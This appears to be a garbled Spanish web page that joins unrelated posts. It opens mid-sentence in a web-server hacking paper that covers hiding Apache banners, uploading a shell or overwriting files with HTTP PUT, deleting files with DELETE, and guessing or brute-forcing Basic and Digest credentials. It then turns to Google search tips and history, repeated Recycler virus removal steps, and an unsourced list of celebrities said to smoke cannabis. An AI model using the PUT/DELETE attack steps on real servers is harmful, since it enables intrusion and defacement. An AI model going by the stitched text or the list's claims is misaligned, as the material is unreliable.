AP_SERVER_MINORVERSION_NUMBER 0 #define AP_SERVER_PATCHLEVEL_NUMBER 0 #define AP_SERVER_DEVBUILD_BOOLEAN 8 Ahora lo instalamos y, probamos nuestra modificación: [Lix@Fedora ~]$ nc localhost 80 HEAD / HTTP/ 1.0 200 OK Connection: close Date: Thu, 10 Jan 2008 11:25:14 GMT Server: Knight Force HTTP Server//2.0.0.8 (Unix) Content-Type: text/html Client-Date: Thu, 10 Jan 2008 13:36:24 GMT Client-Peer: 127.0.0.1:80 Client-Response-Num: 1 Otra forma mucho menos tediosa seria bajar el paquete mod_headers. Se trata de un módulo de apache, que permite modificar las cabeceras devueltas por el servidor. Por ejemplo una vez instalado, añadiendo al fichero de configuración de apache la siguiente línea: Ya hemos visto como evitar el banner grab, pero ahora vamos a intentar defendernos del fingerprinting. Nosotros hemos usado 4 test para conseguir identificar el servidor con máxima certeza, sin embargo existe una herramienta muy usada para el fingerprinting, su nombre se llama httprint[8]. Dicha herramienta está cruzificada dentro de las reglas de mod_security Cuando instalemos mod_security[9] deberemos editar el fichero /etc/modsecurity2/modsecurity_crs_10_config.conf. Sustituyendo la línea: Por: Elegimos el nombre que mas nos apetezca. Ahora obligamos a Apache a recargar sus ficheros de configuración: /etc/init.d/apache2 force-reload 0x06: Ataques con Metodos Como vimos al inicio de este paper sobre el protocolo HTTP existen diversos métodos que sirven para el manejo remoto de archivos, tales como PUT, COPY o DELETE. Estos métodos si están permitidos en un servidor puede jugar muy malas pasadas, ya que mandando una cabecera PUT con el código fuente de una shell podríamos tener control casi total del servidor, subir un exploit, etc… En este capítulo nos centraremos en el manejo de estos métodos “peligrosos” para los webmasters, así como aprender a desactivarlos para evitar males mayores. /.0x09 Creación y borrado de ficheros (Put y Delete) Cuando encontramos un servidor con los métodos PUT y DELETE admitidos podemos considerarnos muy afortunados, puesto que tenemos casi todo el trabajo hecho. Vamos a empezar hablando de PUT. PUT es un método que funciona a la inversa que GET, es decir, en vez de leer el contenido de un fichero lo que hace es escribir sobre él, como ya vimos al inicio de este paper. Esto nos da una gran ventaja puesto que podemos subir una shell al servidor. Pero… ¿Cómo Header set Server Knight Force HTTP Server SecServerSignature "Apache/2.2.9 (Fedora)" SecServerSignature "Knight Force HTTP Server" ServerTokens Full funciona PUT?. PUT necesita de unos parámetros básicos, que si lo pensamos bien resultan lógicos. Lo que necesita es primero hacer la petición al fichero sobre el que deseamos sobrescribir. En caso de que el archivo al que le hacemos PUT no exista, se creará. Bajo nuestro punto de vista vemos con mejores ojos a la hora de hacer un “buen asalto” el aprovechar ficheros ya creados, porque así nuestra shell pasará desapercibida en el servidor. Otro parámetro que necesita PUT es la longitud (número de caracteres) que tendrá el source del archivo, es decir, cuanto mide el código que vamos a escribir. Para indicar esto, existe un campo llamado Content-Length, el cual deberemos de rellenar con el número exacto de caracteres. Entonces una posible petición sería la siguiente: PUT /index.html HTTP/1.1 Host: Ficticio.com Content-Length: 47 <script>alert(“Testeando método PUT”);</script> Como vemos el uso de PUT es sencillo, pero hay veces que la cosa se complica puesto que pide alguna forma de autentificación para poder llevar a cabo esta petición con éxito. Cuando se usa PUT, el mensaje de que las negociaciones han sido perfectas viene definido por un código 201. Este 201 indica que el archivo ha sido subido/sobrescrito perfectamente. Volviendo a lo de la autentificación, deciros que este tema se tocará en el siguiente capítulo. Como anécdota de PUT, decir que en los servidores IIS 5.0 viene activado por defecto[7], con lo que depende del dueño del servidor el deshabilitad este método, lo que da pie a una alta probabilidad de encontrar este método permitido en servidores antiguos. El gran problema de PUT es que dejan unas huellas en los logs que son increíblemente sencillos de analizar y de ver el fallo, ya que en los logs se recogen las peticiones que habeis realizado. Por contrapartida a PUT encontramos DELETE. Este método, como su propio nombre indica, tiene la función de eliminar el archivo al que le hace la petición. DELETE /index.html HTTP/1.1 Host: <host> User-Agent: -----Demás campos---- Como podemos ver, DELETE es un método fácil de usar, pero que al igual que put suele aparecer deshabilitado, y deja también unos rastros enormes en los logs. Tanto DELETE como PUT necesitan en muchos casos de rellenar el campo “Authorization”, y esto es lo que vamos a ver en el siguiente capítulo. /.0x10 Authorization Con la firme intención de preservar la seguridad en los servidores, la inmensa mayoría a implementado un sistema de autentificación para evitar que usuarios malintencionados no abusen de los métodos que tienen permitidos en el servidor, es decir, dejan allowed métodos tales como PUT o DELETE pero piden algún tipo de identificación para poder llevar a buen puerto la petición. Esta “identificación” puede ser de varios tipos, pero los más extendidos son Basic y Digest. La identificación se envía dentro del header, en el campo Authorization. El tipo de identificación más primitivo y por ello menos seguro es Basic. Este tipo de identificación se basa en una password encriptada en Base64, que generalmente es fácil de extraer con un poco de lógica, ya que en el 60% de los casos se trata del nombre del host, la IP del servidor y cosas por el estilo. La estructura básica para obtener una identificación válida es Base64(Palabra1alabra2). Lo que deberemos de cambiar serán Palabra1 y Palabra2 hasta lograr encontrar el login correcto. A veces encontramos que, si durante la fase de la enumeración hemos localizado un servidor vulnerable a algún tipo de Bypassing para esto, lo que se conoce como HTTP Basic Authentication Bypass, podríamos usarlo para poder llevar a cabo nuestra petición “prohibida”. En caso de que no logremos pasar la fase de verificación de los credenciales, obtendremos como respuesta a nuestra petición un error 401 (Unathorizated), por el contrario si las negociaciones se llevan de forma correcta, puesto que hemos acertado en el password y en el usuario, obtendremos un código OK 201 (en el caso de haber hecho uploading a una shell por ejemplo). El segundo tipo de sistema de autentificación es Digest (Digest access authentication). Este sistema es mucho más seguro que Basic, en cuanto a que no manda la información como texto plano, si no en forma de un hash basado en el algoritmo MD5. Según los stándares, este sistema de autentificación sigue el siguiente comportamiento: HashA = MD5(A) = MD5(username : realm : password) HashB = MD5(B) = MD(method : Digest URI) Response MD5(HashA : nonce : HashB) Sobre este sistema decir que es atacable mediante colisiones, aunque existen mecanismos implementables en los servidores encargados de detectar colisiones dentro de los credenciales. Un segundo ataque algo más “viable” sería el establecer un ataque basado en Fuerza Bruta desde una red de ordenadores. Realmente para explotar un simple PUT o un DELETE llevar a cabo cualquiera de estos dos posibles ataques contra una autentificación Digest es una tontería, pero sí que puede ser necesaria en caso de querer realizar un ataque “a mayor escala” en el cual si que necesitemos romperlo. TARINGA! INTELIGENCIA COLECTIVA

Buscar frase exacta - Si quieres buscar una frase exacta, introdúcela entre comillas ("". Por ejemplo: "diarios deportivos" Encontrar páginas que incluyan determinadas palabras - Para encontrar páginas que incluyan determinadas palabras, pero no otras, deberemos incluir el signo '-' delante de las que no queremos buscar. Por ejemplo, para descubrir webs que incluyan la palabra 'tienda', pero no la palabra 'online': tienda -online Encontrar páginas que incluyan una determinada palabra u otra - Si pretendemos encontrar una determinada palabra u otra, usaremos 'OR' (o bien el símbolo '|' (AltGr+1). Por ejemplo, para buscar webs de en los que aparazca 'tienda' y 'zapatos', o bien 'tienda' y 'pantalones': tienda (zapatos OR pantalones) tienda (zapatos | pantalones) Forzar palabras para su búsqueda - Hay numerosas palabras (en español: 'a', 'de', 'el', ...; en inglés: 'to', 'of', 'the',...) que Google no tiene en cuenta en sus búsquedas, a no ser que lo indiquemos. Para ello, escribiremos el signo '+' delante de estas palabras. Por ejemplo, estas dos búsquedas no generan los mismos resultados: el mundo +el mundo Uso de comodines - Se puede hacer uso de comodines. Esto es, el símbolo '*' puede ser usado para sustituir a una palabra, y facilitar algunas búsquedas. Por ejemplo: "los * años" "los * * años" Mayúsculas y minúsculas - No es necesario distinguir las mayúsculas de las minúsculas. Estas dos búsquedas generan los mismos resultados: NoTiCiAs noticias Uso del comando Link: Lista todos los enlaces, que teniendo page rank 4 o más, apuntan a nuestra página. Su uso es sencillo: link:www.direccion.com Uso del comando Allinurl: Muestra todas las páginas indexadas de un dominio indicado, o bien, las páginas que tienen todas las palabras especificadas en su url. Su sintaxis es: allinurl:www.dominio.com Uso del comando Allintitle: Muestra las páginas que tienen todas las palabras especificadas en su título. allintitle: palabra1 palabra2 Devuelve las páginas que tienen palabra1 y palabra2 en su título. Uso del comando Allintext: Páginas que tengan todas las claves especificadas dentro de su body. Uso del comando Allinanchor: Páginas que tengan en el texto que las apuntan las palabras especificadas. Uso del comando Site: Indica un determinado dominio que le indiquemos para realizar la búsqueda. Un ejemplo de su uso sería: site:www.dominio.com palabra Esto busca todas las páginas con alguna ocurrencia 'palabra' dentro del dominio especificado. También lo podemos usar para saber cuántas urls tiene indexadas google de un dominio: Ejemplo: site:website.com Uso del comando Info: Nos muestra información sobre la página principal de un dominio especificado. info:www.dominio.com Uso del comando Inurl: Busca la palabra que le especifiquemos en la url, pero no pide que todas estén en la url como allinurl. Uso del comando Intitle: Busca la palabra que le especifiquemos en el título, pero no es necesario que todas estén en el título. Por ejemplo intile:clave1 clave2 Busca clave1 en la url. Uso del comando Cache: Nos lleva directamente a la versión que tiene google de una determinada página. cache:www.dominio.com Y directamente a la caché que tiene almacenada google de www.dominio.com. Uso del comando Related: Según google nos muestra sitios relacionados con la dirección que le especifiquemos, a saber que criterio sigue, porque los resultados más que malos, son nulos. No merece la pena usarlo. Uso del comando Stocks: Nos lleva a Yahoo Finance y nos muestra información de tipo financiero relacionada con la marca que le indiquemos. Uso del comando Filetype: Busca un tipo de documento especificado, por ejemplo: filetype:doc clave Busca ficheros '.doc' relacionados con 'clave'. ¿Útil, no?. Uso del comando Define: Para buscar la definición de una palabra debemos utilizar la palabra "define:" seguido de dos puntos, luego de los dos puntos debemos indicar la palabra a buscar. "hacker" "define:hacker" Operadores en google 1. " " : Las comillas son un tipo de operador especial que usaremos para buscar cadenas exactas. "Clave1 y Clave2", busca páginas con esa ocurrencia exacta, clave1 seguido de y, a su vez seguido de clave2. 2. '+' : Es el operador AND, busca esto, y esto otro. 3. '-' : Especifica que no se busque lo que sigue al '-'. Ejemplo: clave1 -clave2, busca páginas relacionadas con 'clave1' pero en las que no aparezca 'clave2'. 4. OR : El operador OR, siempre va en mayúsculas. Busca bien esta cosa, esta otra, o las dos. clave1 OR clave2, busca páginas relacionados con algunas de las dos claves o con las dos. 5. 1850..1900: Búsquedas por rango de números. Utilidades en google 1. www.dominio1.com OR www.dominio2.com : Gracias a esto podemos comparar dos páginas de temáticas completamente diferentes y ver cual de las dos está mejor valorada por google, sin centrarnos en términos particulares. 2. inurl:addurl o inurl:addurl clave.: Y tendremos unas cuantas direcciones para dar nuestra página de alta, si añadimos clave al lado, tendremos más posibilidades de que nos salgan páginas relacionadas con la clave escrita. 3. site:www.dominio.com -cadena: Suponiendo que 'cadena' no sale en ninguna página de www.dominio.com, google nos listará directamente todas las páginas que tenga indexadas de ese dominio. 4. "+www.dominio.+.com": Lista todas las páginas en las que aparece la cadena exacta www.dominio.com. Búsquedas en Google a través del e-mail Hay ocasiones en que no se tiene acceso a navegar por Internet pero sí al e-mail, y un buen modo de adelantar trabajo es poder realizar una búsqueda en Google a través del correo electrónico. Para esto sólo hay que enviar un mensaje a google-DE-capeclear.com, poner en el asunto las palabras clave de tu búsqueda y al poco tiempo recibirás los resultados de la búsqueda en tu buzón de correo electrónico. Enlace directo: Más útil es la siguiente idea: almacena este enlace a Google por e-mail en tu escritorio. ¿Cómo?, haz click derecho sobre el enlace y pulsa en ->Copiar acceso directo, y luego haz click derecho sobre tu escritorio y pulsa en -> Pegar acceso directo. Así tendrás creado un acceso directo a las búsquedas en Google, a tu alcance. Las 100 webs más citadas de la red Un par de datos muy curiosos: ¿Cómo saber cuáles son las webs más citadas de la red según google? Poned "http" (sin comillas) en la caja de búsqueda y voilà!: - Las 100 webs más citadas en inglés. - Las 100 webs más citadas en castellano. Una calculadora de PageRank - Google PageRank Report - Google PageRank Prediction - Find out your Google PageRank easy! - Estimate your PageRank without the Google toolbar! - Check your Google PageRank using our Google PageRank calculator - Google pagerank analysis tool - Keyword Pagerank Finder - Google's PageRank - Calculator Una aplicación para vigilar a googlebot Para todos aquellos que necesitáis saber cómo, cuándo, etc., indexa googlebot vuestra web, gracias a Fernando os brindamos esta aplicación tan interesante, googlestats. Otra es RobotStats. Está escrita en php y analiza en forma de estadísticas lo que hace googlebot cuando os visita Posicionamiento web en Google El posicionamiento en buscadores se ha convertido en los últimos tiempos en una de las herramientas más cotizadas por los webmasters. En particular, aparecer en las primeras posiciones en Google es algo indispensable si quieres generar tráfico hacia tu sitio web, ya que Google responde a casi el 60% de las búsquedas de Internet. El tutorial que te proponemos te ayudará a conseguir un buen posicionamiento web, pero no esperes resultados en unos días, ni en unas semanas, ni quizá en meses. Se trata de un trabajo constante -generando contenidos, optimizando páginas web y buscando enlaces- cuyos resultados son a largo plazo. 1.- Buenos contenidos. Este es el punto principal, ya no solo para aparecer en los primeros puestos en Google, sino para que la gente visite tu sitio web. 2.- Tecnología web. Éstate informado de las últimas novedades en cuanto a servidores o lenguajes de programación. Te harán la tarea de gestionar los contenidos mucho más amena, y puedes "gustar más a Google". 3.- Sencillez. Al robot de Google no le gustan las páginas con excesivas decoraciones y simplemente busca textos legibles y contenidos claros. 4.- Alta en Google. El primer paso para conseguir una buena posición en Google es aparecer en el buscador. Descubre cómo hacerlo. 5.- Conseguir enlaces. Es el pilar fundamental para obtener un PageRank alto. Intenta aparecer en los principales directorios (Yahoo! y DMOZ) y que te enlacen desde otros sitios web. 6.- Evitar penalizaciones. Google sabe que muchas personas le intentan engañar, y está empezando a tomar medidas contra páginas web que realizan prácticas poco éticas para mejorar su posicionamiento. Infórmate de cuáles son y cómo evitarlas. 7.- Conseguir ayuda. El posicionamiento requiere estar informado constantemente. Fuente: google.dirson.com Historia del buscador Google Historia de Google. Los comienzos - primavera 1995: Sergey Brin (23 años entonces) y Larry Page (24), confundadores de Google y actualmente presidente y CEO, se conocen en un acto que la Universidad de Stanford organiza para los candidatos de su Doctorado en Informática. - otoño 1995: Larry y Sergey comienzan a trabajar en el 'Digital Library Project' de la Universidad de Stanford http://www-diglib.stanford.edu/. Larry Page, con experiencia en diseño web y el título de Ingeniero Eléctrico, y Sergey Brin, un experto en tratamiento de datos y Licenciado en Informática y Ciencias Matemáticas, comienzan a crear un algoritmo para la búsqueda de datos. Esta tecnología se convertirá mas tarde en el corazón que hará funcionar a Google. El nombre que Larry Page da a esta tecnologia fue 'PageRank'. En su pagina web personal de la Universidad de Stanford, colgará en 1997 una presentacion que lo explica: 'PageRank: Bringing Order to the Web' http://hci.stanford.edu/~page/papers/pagerank/. - enero 1996: Comienzan a desarrollar un buscador llamado 'BackRub' http://web.archive.org/web/19971210065425/backrub.stanford.edu/backrub.html. Este nombre se lo dan debido a que la mayor habilidad de este motor de búsqueda es analizar los 'back links' (enlaces que apuntan a una determinada página). Tal y como indican en su descripción http://web.archive.org/web/19971210065425/backrub.stanford.edu/backrub.html, Backrub está escrito en Java y Python (incluso Larry Page postea alguna duda en los 'newsgroups' http://groups.google.com/groups?selm=page-0701962007020001%40qwerty.stanford.edu), y corre sobre varias máquinas Sun Ultra y Intel Pentium con Linux. La Base de Datos está alojada en un ordenador Sun Ultra II con 28GB de disco duro. Si tienes cualquier duda sobre el funcionamiento de este buscador, y no está contestada en sus FAQ http://web.archive.org/web/19971210065437/backrub.stanford.edu/FAQ.html, puedes llamar al (415) 723-3154, y preguntar por Larry. Los primeros usuarios son los alumnos y profesores de Stanford, que disfrutan de la precisión con la que el buscador encuentra datos en la web. - 1997: 'Backrub' se transforma en 'Google' http://web.archive.org/web/19971210065417/backrub.stanford.edu/. Le otorgan este peculiar nombre por su parecido a la palabra 'googol', que en inglés es el nombre que que se da a la cifra '10 elevado a 100' (un uno seguido de 100 ceros). Ya tienen indexadas 24 millones de páginas. Mucho antes, ya han tenido problemas de capacidad en sus discos duros, y han tenido que idear ingenios basados en Lego, como este http://www-db.stanford.edu/pub/voy/museum/pictures/display/0-4-Google.html. En los comienzos de Google (en el dominio google.stanford.edu http://web.archive.org/web/19980502040303/google.stanford.edu/), su diseño es aún más austero de lo que será posteriormente. En esta antigua versión se incluyen fotografías de los equipos que utilizan http://web.archive.org/web/19980502040406/google.stanford.edu/googlehardware.html. Historia de Google. Fundando una empresa - 1997: Larry y Sergey han registrado el dominio 'google.com'. Además, han dado a conocer su tecnología a la 'Office of Technology Licensing' (OTL) http://otl.stanford.edu/ de la Universidad de Stanford, que será la encargada de contactar con diferentes compañías de Internet que puedan estar interesadas en Google. - enero 1998: A Sergey y Larry no les gusta ninguna de las ofertas recibidas, bien por ser económicamente bajas, o porque no van a desarrollar correctamente la tecnología. Por ello, deciden ser ellos los que creen su propia empresa. Es entonces cuando el dormitorio de Larry Page se convierte en el nuevo hogar de Google, llevando todos los equipos informáticos junto a su cama. La habitación de Sergey Brin, situada al lado de la de Larry, se convierte en la oficina financiera. Google sigue indexando paginas rápidamente, y Larry y Sergey necesitan mucha más capacidad en sus discos duros. Tienen que adquirir un terabyte, y finalmente consiguen comprar varios discos duros rebajados, todos por $15,000. A pesar de la 'fiebre de los punto com' de aquellos días, Larry y Sergey no consiguen encontrar un inversor que financie Google, y tienen que conseguir todo el dinero de sus familias y amigos íntimos. Mientras tanto, habían abandonado su Doctorado en Stanford. - verano 1998: En casa de un amigo común, Sergey y Larry conocen a Andy Bechtolsheim (cofundador de Sun Microsystems y vicepresidente de Cisco Systems), y comienzan a charlar sobre Google. Después de treinta minutos, Bechtolsheim les firma un cheque por $100,000, a nombre de 'Google Inc.'. Esta empresa, como tal, no existe, y para poder cobrar el cheque (que está dos semanas sobre la mesa de Larry), tienen que buscar un local, y fundar una nueva compañia: 'Google Inc.'. - septiembre 1998: Google Inc. abre sus puertas en un garaje que un amigo les alquila en Menlo Park, en California. Rápidamente, instalan varias líneas telefónicas, un cable modem, una línea DSL, y una plaza de aparcamiento para su primer empleado, Craig Silverstein (actualmente, Director de Tecnologia de Google). 25 millones de páginas están indexadas (http://web.archive.org/web/19981111183552/google.stanford.edu), y Google recibe diez mil consultas por día. La revista 'PC Magazine' lo incluye dentro de su lista 'Top 100 Web Sites' de 1998. - febrero 1999: La plantilla asciende a 8 personas, responde a 500.000 consultas por día, se trasladan a unas nuevas oficinas en Palo Alto, y firma su primer contrato comercial con RedHat, el cual empieza a suministrar el Sistema Operativo Linux de los servidores de Google. Mientras tanto, continúan con su campaña comercial: el boca a boca. Fuente: google.dirson.com Preguntas directas que tienen respuesta directa en Google - Calculadora: (5 * 8) + 5 = 45 - Radio de la tierra: radius of earth in km - 90 grados fahrenheit en centígrados: 90 fahrenheit in centigrade - Un día en segundos: one day in seconds - 1 hora * 128 kbps en megabytes: 1 hour * 128 kbps in megabytes Servicio de comparación basado en Google En Google Fight puedes comparar cara a cara dos conceptos para conocer cuál de ellos es más popular que el otro. Por ejemplo: Raúl vs Ronaldo Todo sobre Google en Español - Google.dirson.com - Posicionamiento web en Google - Trucos de google Google Bombing ¿Qué es un 'Google Bombing'? Se trata de conseguir que una determinada página web aparezca, en la búsqueda de una o varias palabras concretas, en la primera posición de los resultados de Google. ¿En qué consiste un 'Google Bombing'? Los promotores del 'Googlebombing' piden a los responsables de otros sitios web que inserten enlaces del tipo: <A href=http://url_de_la_pagina>palabra1 palabra2</A> El 'Google Bombing' se basa en el núcleo del funcionamiento de Google: los enlaces. Cuantos más enlaces obtenga una determinada página con una palabra (o palabras) en concreto, más posibilidades tendrá de aparecer en las primeras posiciones. Incluso puede ocurrir que dentro de la página web objetivo del 'Google Bombing' no aparezca ni una sola vez las palabras de la búsqueda. Se trata de la misma técnica que se utiliza en el posicionamiento web, pero enfocada en una reivincidación social o política. ¿Cuál es la finalidad de un 'Google Bombing'? Los promotores pretenden que se identifique al protagonista de la página web víctima del 'Google Bombing' con la palabra buscada. Así, cuando se promovió el 'miserable failure' contra George Bush, se perseguía que los usuarios de Google identificaran al presidente de EEUU con un 'miserable fracaso'. ¿Qué otros 'Google Bombings' han dado resultado? :: Petrolero Prestige :: John Kerry - 'waffles' :: 'jew' ('judío') :: Jacques Chirac - 'magouilleur' :: Jan Peter Balkenende - 'raar kapsel' :: El príncipe holandés Willem-Alexander para la búsqueda slechte tanden ('dientes malos'), debido a su mal cuidada dentadura. :: 'Memorias de un Geek' propuso uno contra la SGAE, con la palabra 'ladrones'. :: "gafe" y sale ZP :: "miserable" y sale Acebes Curiosidades - El día 1 de abril de 2002 (April Fool's day), Google dio a conocer el PigeonRank (TM), el sistema que realmente clasifica las webs: miles de palomas trabajan ordenando todas los sitios web de Internet. - En Pascua de 2001, aparecio un curioso juego (realizado en un applet de Java) sobre un conejito que recogía huevos de Pascua. - En el Zeitgeist de Google vas a poder encontrar un montón de estadísticas: las palabras más buscadas de la semana en diferentes idiomas, los navegadores más utilizados, ... Además, tiene un archivo histórico. - Google tiene varias ofertas de trabajo: técnicos en software o sistemas, ventas, marketing, finanzas, ... Además de entrar en una gran empresa tecnológica, un seguro médico, y un seleccionado menú para comer, te ofrecen alguna que otra fiesta como esta. - La gente de Google tiene registrados las decenas de errores que los usuarios han cometido al intentar buscar uno de los nombres más buscados: el de Britney Spears. - Google tiene registrados algunos dominios que se parecen al verdadero, los cuales difieren en alguna letra, y que -debido a que muchos usuarios escriben mal 'google'- llevan al sitio web correcto: gogle.com, googel.com, ggoogle.com o gogole.com. - Incluso tiene registrado el dominio 466453.com (prueba a escribir 'google' en tu teléfono móvil). Google tiene varios servicios wireless en desarrollo. - Otro April Fool's Day, pero de 2000, Google lanzó el sistema de búsqueda MentalPlex (TM), que era capaz de leer tu mente, y encontrar los resultados a la búsqueda que estabas pensando. - Google organizó en 2002 un concurso de programación, que ofrecía diez mil dólares y una visita a la sede central de la compañía. - Existe un curioso 'mirror' (servidor 'espejo') de Google: elgooG. - El Googlewhacking es un 'deporte' que consiste en encontrar una pareja de palabras (que estén incluidas dentro del diccionario de inglés) que aparezcan una sola vez juntas en alguna página indexada por Google. Es decir, que buscándolas, obtengamos 'Resultados 1 - 1'. - El comportamiento de Google durante los atentados en USA el 11 de septiembre de 2001 fue elogiado por muchos. Realizó 'cachés' de varios medios de comunicación (que en aquel momento estaban colapsados), y condujo muchas de sus búsquedas hacia noticias de actualidad. - Tras la adquisición del archivo de noticias de Usenet que tenía la empresa Deja News, Google publicó unalista con los 'posts' referentes a los hechos más relevantes de la historia de Internet durante estos últimos años. Hay referencias a acontecimientos como las primeras menciones a Google o Yahoo, el primer post anunciando los ataques a las torres gemelas el 11 de setiembre de 2001, las primeras menciones a Linux o Microsoft, la primera discusión sobre el SIDA, ... - El algoritmo de 'PageRank' está patentado en Estados Unidos con el número de patente '6,285,999', y con el título 'Method for node ranking in a linked database'. - Si miramos el 'Acerca de...' de la 'Google Toolbar', vemos que -además de la versión- aparece la frase en latín 'De parvis grandis acervus erit', que podría traducirse como 'De las cosas pequeñas se hacen las cosas más grandes'. Esta frase fue utilizada en el siglo XVI en un libro de poemas. - Para que nadie piense mal, las páginas de la tienda de Google (Google Store) tienen PageRank cero. - Chad Lester, un trabajador de Google, recorrió en bicicleta en el año 2001 las más de 3500 millas que separan California de Florida. Répiclas del jersey que llevaba se vendieron en la GoogleStore. Palabras más buscadas (Google Zeitgeist) Sorpresas, pautas y tendencias de búsqueda según Google Zeitgeist 2011: Qué es lo que ha buscado el mundo http://www.google.es/press/zeitgeist.html Anteriores: Google Zeitgeist 2010 Google Zeitgeist 2009 Google Zeitgeist 2008 Google Zeitgeist 2007 Google Zeitgeist 2006 Google Zeitgeist 2005 Google Zeitgeist 2004 Google Zeitgeist 2003 Google Zeitgeist 2002 Google Zeitgeist 2001 http://www.google.es/press/zeitgeist/archive.html Herramienta para palabras clave de AdWords de Google --> https://adwords.google.es/select/KeywordSandbox Buscadores Específicos en Google BSD Gobierno de USA Linux MAC Microsoft Universidades ¿Cómo evito que Google busque en mi sitio? Google utiliza "Robots" de busqueda, para evitar que los robots entren a tu sitio debemos hacer lo siguiente. En la raiz de nuestro sitio, debemos poner un archivo de nombre "robots.txt" Y dentro de este archivo podemos listar a donde no queremos que los robots del Google accedan. Miremos un momento el archivo, robots, alojado en www.google.com (asi es, google evita que su propio buscador acceda al mismo sitio, esto por seguridad.) Con Allow, permiten la busqueda y con Disallow la deniegan.

Eliminar virus Recycler1. Abrir una consola de comandos (cmd.exe)2. Finalizar el proceso del explorador (explorer.exe):taskkill /f /im explorer.exe 3. Tipear:cd Recycler 4. Quitar los atributos de la carpeta S-1-5-21-1482476501-1644491937-682003330-1013 con el comando:attrib -h -r -s S-1-5-21-1482476501-1644491937-682003330-1013 5. Renombrar la carpeta, una forma bien simple de arruinarle los planes a este virus:ren S-1-5-21-1482476501-1644491937-682003330-1013 aaaaaa 6. Abrir el explorador de windows tipeando en la consola:explorer.exe. 7. Ir a la carpeta Recycler y veremos nuestra carpeta llamada aaaaaa . Accedemos a la carpeta y veremos el contenido: ise.exe, isee.exe y desktop.ini. Procedemos a eliminar esos archivos y limpiamos la ruta del registro HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{08B0E5C0-4FCB-11CF-AAX5-90401C608512}. Eliminar virus Recycler 8. Abrir una consola de comandos (cmd.exe)9. Finalizar el proceso del explorador (explorer.exe):taskkill /f /im explorer.exe 10. Tipear:cd Recycler 11. Quitar los atributos de la carpeta S-1-5-21-1644491937-1715567821-725345543-1003 con el comando:attrib -h -r -s S-1-5-21-1644491937-1715567821-725345543-1003 12. Renombrar la carpeta, una forma bien simple de arruinarle los planes a este virus:ren S-1-5-21-1644491937-1715567821-725345543-1003aaaaaa 13. Abrir el explorador de windows tipeando en la consola:explorer.exe. 14. Ir a la carpeta Recycler y veremos nuestra carpeta llamada aaaaaa . Accedemos a la carpeta y veremos el contenido: ise.exe, isee.exe y desktop.ini. Procedemos a eliminar esos archivos y limpiamos la ruta del registro HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{08B0E5C0-4FCB-11CF-AAX5-90401C608512}.S-1-5-21-1644491937-1715567821-725345543-500 Unete a la Comunidad Tus Descargas, Tus Subidas en La que encontraras Todas tus Desacargas de diferentes Categorias

Pues que ppedo aqui esta de nuevo pero con imagenes talvez me dan unos puntos oksimon...ADVERTENCIAEsta lista se basa en declaraciones de los mismos involucrados en este hábito humano tan mal visto. Si estas en esta lista y te molesta o te parece un escrache, queremos que sepas que no es de mala onda ni de botones. Es como para hacer un feliz recorrido entre quienes podriamos pasar una tarde desinteresada de faso y de otros seres abominables como algunos presidentes de estados unidos. Drogarse no hace a nadie mas “agradable” o “copado” o “persona tolerante”. La droga se encuentra en todos lados presente, es parte de la vida humana, no la droga, sino los estados alterados de conciencia o para ser mas amplios, “los estados”… Sin embargo el doble discurso, la moral y el prestigio social hacen del consumo de cannabis muchas veces un montón de mitología terrorista-cristiana.Disfruta de la lista y mandá si sabes de algun otro famoso postealo…ah otra cosa esta es una lista de famosos que fuman y fumaron. aclaracion q fueron o son x q unos y ano viven * Aaron Sorkin, creador de ”The West Wing”.* Abbie Hoffman, Activista* Abraham Lincoln. Presidente de los Estados Unidos de América. Curiosamente, otros presidentes de este pais también fumaron y eran partidarios del cultivo de cannabis.* Andrew Jackson/b]* Zachary Taylor.* Franklin Pierce.* George Washington , cultivó y hay evidencia de que preparó un poco para fumar* También Bill Clinton y George Bush.* Aleister Crowley, Escritor y famoso satanista.* Alexander Dumas, Escritor de ¨Los Tres Mosqueteros¨* Ali Campbell, cantante en UB40* Alice B. Toklas. Famoso cocinero – Hash Fudge , se filmó ‘I Love You Alice B. Toklas’* Andrea Corr, cantante, “The Corrs”.* Anjelica Huston, Actriz* Arthur Rimbaud.* Balzac.* Barreiro Dolores, modelo y conductora de tv. declaró que fumó y que estaba a favor de los alucinógenos naturales.* Beatles.* Benjamin Franklin, Muchas declaraciones y pocas pruebas* Bill Gates. No está confirmado, pero en una entrevista en Playboy lo insinua.* Bill Murray Arrestado por poseción* Bing Crosby. escribió “I’m dreaming of a White Christmas”. El Film “High Society” ahora tiene sentido.* Bix Beiderbecke músico de jaz* Black Crowes, musicos* Bob Denver, Estrella en la serie ¨La isla de Guiligan¨* Bob Dylan, musico* Bob Marley, musico reggae* Burt Reynolds, actor. Dejó a su mujer por este tema. Pero, se lo ha visto en Coffe Shops* Bruce Lee el ninja* Cab Calloway, Jazz músico. Declaró haber fumado solo una vez* Carl Sagan, Científico – escritor de ciencia ficción – escribió el film “Contact” Más información* Carlos Santana musico,* Carrie Fischer, Actriz* Charlie Sheen, actor.* Charles Beaudelaire, Escritor francés* Cheech Marin, Actor, actuó junto con Don Johnson’s en la serie de TV “Nash Bridges.”* Chris Farley. Comediante* Chrissie Hynde, musico.* Chris Rock, Actor, Comediante, Productor, escritor.* Claire Rayner, Agony Aunt.* Conan O’Brian Conductor de TV.* 10, Lider de una banda de Jazz . Estuvo en una lista de la DEA de fumadores de faso* También fumó el hombre de la Edad de Piedra* Revolucionarios mexicanos, cantaban la conocida canción ¨la cucaracha¨, que dice ¨ya no puede caminar, porque le falta, porque no tiene, la patita de atrás¨, esa patita que le falta a la ¨cucacaracha¨ es la marihuana que fumaban y que exigían para ir a pelear, la canción era para exigirla. ver Pancho Villa* Tantos grupos de rock le han dedicado canciones al cannabis, que sería imposible hacer una lista de ellos. De hecho, aquí intentamos solo mencionar a fumadores que de algún modo son ilustres en algún “rubro” o representan la lucha por la despenalización y legalización de la marihuana.* José de San Martín, procer argentino, libertador. Abusó del opio y dicen que cultivo cannabis, pero no lo sabemos.* Aldous Huxley, Escritor y filósofo, Realizo varias experiencias con LSD y mescalina pero no sabemos si fumó.* Arthor Conan Doyle, Escritor, “Sherlock Holmes”. No se encontró evidencia sobre su actividad marihuanera.* Buddy Rich, Jazz músico. No hay evidencia, pero sus amigos todos si que fumaban, eh.* Cary Grant, – No hay evidencia, participó en pruebas legales de LSD.* Charles Dickens, fumó laudanum, pero no hay evidencia de que haya usado cannabis.* Edgar Allen Poe, Escritor, fumaba opio, eso está claro (en su obra), pero no sabemos si cannabis.* 